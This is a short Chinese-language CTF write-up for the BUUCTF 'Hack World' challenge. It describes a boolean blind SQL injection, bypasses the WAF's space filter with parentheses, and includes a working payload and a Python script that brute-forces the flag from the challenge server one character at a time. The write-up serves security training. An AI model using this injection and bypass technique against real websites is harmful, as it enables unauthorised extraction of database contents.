C
C
CTF-WriteUp
Search
⌃K

[华北赛区]Hack World

传入id,有两种返回结果,1以及2。很容易的推测到可能是布尔盲注。
fuzz之后发现WAF了空格(BUUFCTF的容器通常是顶不住fuzz的)。使用括号可以绕过。
这里直接用了通杀语句if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)
exp
import requests
string = "Hello, glzjin wants a girlfriend."
url = "http://c51bbb75-0b7f-4f51-8343-a1e164f75d10.node3.buuoj.cn/index.php"
flag = ""
for i in range(50):
for j in range(127):
payload = "if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)" % (i, j)
data = {'id': payload}
files = []
headers = {}
response = requests.request("POST", url, headers=headers, data=data, files=files)
print(j)
#为了防止因网络原因而导致爆破中断丢失数据
if response.text.find(string) != -1:
flag += chr(j)
print(flag)
break